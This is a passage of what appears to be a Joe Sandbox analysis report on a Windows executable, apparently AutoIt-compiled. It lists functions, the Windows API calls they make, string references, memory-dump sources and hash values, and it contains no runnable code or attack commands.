Opcode Fuzzy Hash: 5f7a7664f17da1d19d8954cca8c3b176727d96928ac8342286fd15acdcdd70ab
Instruction Fuzzy Hash: 7BF0C8B3600614BED7159F38D806BA7BBA8EB44760F10853EF619CB1D1DB35E55087E0

Function 00744C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00711129,00000000,?,00742E29,00000001,00000364,?,?,?,0073F2DE,00743863,007E1444,?,0072FDF5,?), ref: 00744CBE

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 684cb63b132dec826163496a89eaec8a492cc08efb4f3744cfb6f428d438e346
Instruction ID: de84e5fc178d8d214b39c303ce0938d6651e45a40d35da0365c5fbbbb4210b49
Opcode Fuzzy Hash: 684cb63b132dec826163496a89eaec8a492cc08efb4f3744cfb6f428d438e346
Instruction Fuzzy Hash: 21F0E932603224A7EB315F62AC89B5B3788BF417A1F1C8111FC15AA181CB3CDC0066F0

Function 00743820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d0a7271a6bd409d3eac5dad85aee32aa6fffc57d141abbbb920bd9ed82cfbe6
Instruction ID: baf43af9b646a94707b2f5615ce9bdf9c07b6fd36ae64d4b311f996c418f76aa
Opcode Fuzzy Hash: 0d0a7271a6bd409d3eac5dad85aee32aa6fffc57d141abbbb920bd9ed82cfbe6
Instruction Fuzzy Hash: 5EE0E532141224AAF62126679C05B9BB74DAB827B0F0A0022BC1C96481DB2DED0185F0

Function 00714F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714F6D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c11b6d10422cd28595214c7678423047eb02288be0cf4819301b5c5079df35d7
Instruction ID: b39c22409534f28a96a4f2beedde8827906a01dfd44a995f61bfe2f7a18688fe
Opcode Fuzzy Hash: c11b6d10422cd28595214c7678423047eb02288be0cf4819301b5c5079df35d7
Instruction Fuzzy Hash: 2FF0A070105301CFDB348F28D490892B7F8EF00319318897EE1DA86651C7399885DF00

Function 0077CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0075EE51,007D3630,00000002), ref: 0077CD26

Part of subcall function 0077CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0077CD19,?,?,?), ref: 0077CC59
Part of subcall function 0077CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0077CD19,?,?,?,?,0075EE51,007D3630,00000002), ref: 0077CC6E
Part of subcall function 0077CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0077CD19,?,?,?,?,0075EE51,007D3630,00000002), ref: 0077CC7A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: d21a97bb827a8a13a9784c924f50dfe3753a2b58d35a9d0507d2763355123dae
Instruction ID: 67929de09662b06d2b8d39b1f76ee43bef4362bfce560ae2f00765984cd6789e
Opcode Fuzzy Hash: d21a97bb827a8a13a9784c924f50dfe3753a2b58d35a9d0507d2763355123dae
Instruction Fuzzy Hash: F3E03076500604EFCB229F56D9018AABBF9FF85250710852FE95582110D775AA14DB60

Function 00712DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00712DC4

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6faf21b02cf0af1eddda0951b7f0fd8b36994c43d369bbe4e98e88740bdc7243
Instruction ID: ef46e7dde26e139298ecb2fe795f6294e96c75ef564f41c83da2b11f1bb84556
Opcode Fuzzy Hash: 6faf21b02cf0af1eddda0951b7f0fd8b36994c43d369bbe4e98e88740bdc7243
Instruction Fuzzy Hash: D6E0CD726041245BC72192589C09FEA77EDDFC8791F054071FD09D7288D964AD848550

Function 00712B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00713837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713908

Part of subcall function 0071D730: GetInputState.USER32 ref: 0071D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00712B6B

Part of subcall function 007130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0071314E

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 7a2a03c07a2bb5481ad348de0da96e2d858a5f1acc2b2fc6a66a4c7a04467afa
Instruction ID: 409194b16441804dff6b74a42844c6ffe8a26902afca06ce8ac2de5d6dce600e
Opcode Fuzzy Hash: 7a2a03c07a2bb5481ad348de0da96e2d858a5f1acc2b2fc6a66a4c7a04467afa
Instruction Fuzzy Hash: 7AE0263230428483CB04BB7CA85B4EDA3998BD6351F40043EF142472E3CE2C89C64352

Function 013200D8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 013200E3

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 65d1f280346b11fcef286dfb85ab46242e2fb3d57639afd5d3ece0c1c618c4da
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 4EE0C2B090521CEBDB18EBBDCE49AAD77A9EB05324F204654FD46C32C0D934AA08D750

Function 013200A8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 013200B3

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 43f78c15560815d59576d21afaa985ab04fee47e5bd7ecca53c5b4819550b578
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: AAD0A73090620CEBDB10DFB89D049DD73ACD705324F008754FD15C3280D53699089758

Function 0075039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00750704,?,?,00000000,?,00750704,00000000,0000000C), ref: 007503B7

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 355314f27c768120cf49cee82f4b5c06d1c41d98c15c983ea39391b747edfdcd
Instruction ID: 4dae7c9d816b162cea2ea98dab8e5618de76efff89b4ddcf5f45c17c5ab07e1e
Opcode Fuzzy Hash: 355314f27c768120cf49cee82f4b5c06d1c41d98c15c983ea39391b747edfdcd
Instruction Fuzzy Hash: 32D06C3214010DBBDF028F84DD06EDA3BAAFB88714F018000BE1856020C736E821AB94

Function 00711CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00711CBC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 93ace0ad0194841b87b462004dad1eb3a08eef01334c53c28c6b65d760432aa2
Instruction ID: 7b27006ae3dbb585dc09542d98860080c415c026221e8c6ba1212d1f650abdde
Opcode Fuzzy Hash: 93ace0ad0194841b87b462004dad1eb3a08eef01334c53c28c6b65d760432aa2
Instruction Fuzzy Hash: E8C09B36281344AFF2154784BD9BF107758A34CB00F54C001F6095D5E3C7B51830D658

Function 0078744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00715745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0071949C,?,00008000), ref: 00715773

GetLastError.KERNEL32(00000002,00000000), ref: 007876DE

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: a1435d549a1d06971daad3b8b018f10b77ea79de8938fd2d8f519f52af33cd95
Instruction ID: 4f1e121a4f3be9367cb703a581145557debeeffcd0f8f92c657ee1bafb389034
Opcode Fuzzy Hash: a1435d549a1d06971daad3b8b018f10b77ea79de8938fd2d8f519f52af33cd95
Instruction Fuzzy Hash: 0D81B130648701DFCB19EF28C495AA9B7E1BF88350F14451DF89A5B2D2DB38ED85CB52

Function 01321AD4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01321AE9

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: f4ec0e5338f786b0f7957cc33ab1c51c78de61d1910edbea0926ee4444310fc9
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: F1E0BF7494410DEFDB00EFA4D6496DD7BB4EF04312F1005A1FD05D7680DB309E54CA62

Function 00716246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,007524E0), ref: 00716266

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0d56b18cc459581b3ac193774e169d8d7f5903bf1bb7bea5e55a3a9cfab791b1
Instruction ID: 52dbcffb97cc21996fdc3dd714e2172348144fde6e61746ee4dec2fa142883e4
Opcode Fuzzy Hash: 0d56b18cc459581b3ac193774e169d8d7f5903bf1bb7bea5e55a3a9cfab791b1
Instruction Fuzzy Hash: DFE09275400B01DEC7314F1AE804492FBF5FEE13613218A2ED0E5926A4D7B85886CB50

Function 01321AD8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01321AE9

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: c9c82b7e4de0e2ecec84c4f2d9af45354f7a3b674244158596a6fafa2d9d9525
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 20E0E67494410DDFDB00EFB4D6496DD7BB4EF04302F100161FD01D2280D7309D50CA62

Non-executed Functions

Function 007A9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007A961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007A965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007A969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007A96C9
SendMessageW.USER32 ref: 007A96F2
GetKeyState.USER32(00000011), ref: 007A978B
GetKeyState.USER32(00000009), ref: 007A9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007A97AE
GetKeyState.USER32(00000010), ref: 007A97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007A97E9
SendMessageW.USER32 ref: 007A9810
SendMessageW.USER32(?,00001030,?,007A7E95), ref: 007A9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007A992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007A9941
SetCapture.USER32(?), ref: 007A994A
ClientToScreen.USER32(?,?), ref: 007A99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007A99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007A99D6
ReleaseCapture.USER32 ref: 007A99E1
GetCursorPos.USER32(?), ref: 007A9A19
ScreenToClient.USER32(?,?), ref: 007A9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 007A9A80
SendMessageW.USER32 ref: 007A9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 007A9AEB
SendMessageW.USER32 ref: 007A9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007A9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007A9B4A
GetCursorPos.USER32(?), ref: 007A9B68
ScreenToClient.USER32(?,?), ref: 007A9B75
GetParent.USER32(?), ref: 007A9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 007A9BFA
SendMessageW.USER32 ref: 007A9C2B
ClientToScreen.USER32(?,?), ref: 007A9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007A9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 007A9CDE
SendMessageW.USER32 ref: 007A9D01
ClientToScreen.USER32(?,?), ref: 007A9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007A9D82

Part of subcall function 00729944: GetWindowLongW.USER32(?,000000EB), ref: 00729952

GetWindowLongW.USER32(?,000000F0), ref: 007A9E05

Strings

@GUI_DRAGID, xrefs: 007A997D
F, xrefs: 007A9D07
p#~, xrefs: 007A9990

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#~
API String ID: 3429851547-1555356086
Opcode ID: 4885b6d7538bac5e861c3c6e8a6ef7390ae812d9587ce96d4f1f5b08348411d1
Instruction ID: 6a82f58d750d80f826d47a86aeee34baf1f2e70868d32edbe6bfb59c7a7a74e7
Opcode Fuzzy Hash: 4885b6d7538bac5e861c3c6e8a6ef7390ae812d9587ce96d4f1f5b08348411d1
Instruction Fuzzy Hash: DF429D34605240EFD725CF24CC88EAABBE5FF8A320F144659F699872A1D739E860CF55

Function 007A4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007A48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 007A4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 007A4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 007A494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 007A495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 007A497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007A49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007A49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 007A4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007A4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007A4A7E
IsMenu.USER32(?), ref: 007A4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A4B20
GetWindowLongW.USER32(?,000000F0), ref: 007A4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 007A4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 007A4C82
wsprintfW.USER32 ref: 007A4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007A4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 007A4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007A4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007A4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 007A4D5A

Strings

%d/%02d/%02d, xrefs: 007A4CA8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 90b8f79fa7530de59787143d32536e04b7c1145ad3d2c4efbd21cea40bd0b838
Instruction ID: 30c6300bd6b80a34e4908a5955d2e2492ee48131dc943114950bd07f17795a1d
Opcode Fuzzy Hash: 90b8f79fa7530de59787143d32536e04b7c1145ad3d2c4efbd21cea40bd0b838
Instruction Fuzzy Hash: 7F12D071600214ABEB258F28DC49FAE7BF8EFC6310F144269F516EA1E1DBBD9940CB50

Function 0072F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0072F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076F474
IsIconic.USER32(00000000), ref: 0076F47D
ShowWindow.USER32(00000000,00000009), ref: 0076F48A
SetForegroundWindow.USER32(00000000), ref: 0076F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0076F4AA
GetCurrentThreadId.KERNEL32 ref: 0076F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0076F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0076F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0076F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0076F4DE
SetForegroundWindow.USER32(00000000), ref: 0076F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F4F6
keybd_event.USER32(00000012,00000000), ref: 0076F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F50B
keybd_event.USER32(00000012,00000000), ref: 0076F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F519
keybd_event.USER32(00000012,00000000), ref: 0076F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F528
keybd_event.USER32(00000012,00000000), ref: 0076F52D
SetForegroundWindow.USER32(00000000), ref: 0076F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0076F557

Strings

Shell_TrayWnd, xrefs: 0076F46F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: ad45ca6c94f6a93eea2836f35a993232b7eee342b020b3f77d46d15c4c93711b
Instruction ID: c74e06e898cf58708ede0b832b91664226dcd9e869fee5993b54badd4cbcc2b9
Opcode Fuzzy Hash: ad45ca6c94f6a93eea2836f35a993232b7eee342b020b3f77d46d15c4c93711b
Instruction Fuzzy Hash: C3318671A40218BFEB216BB55C4AFBF7E6CEB85B50F204065FA01F61D1CBB85D10AE64

Function 00771201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

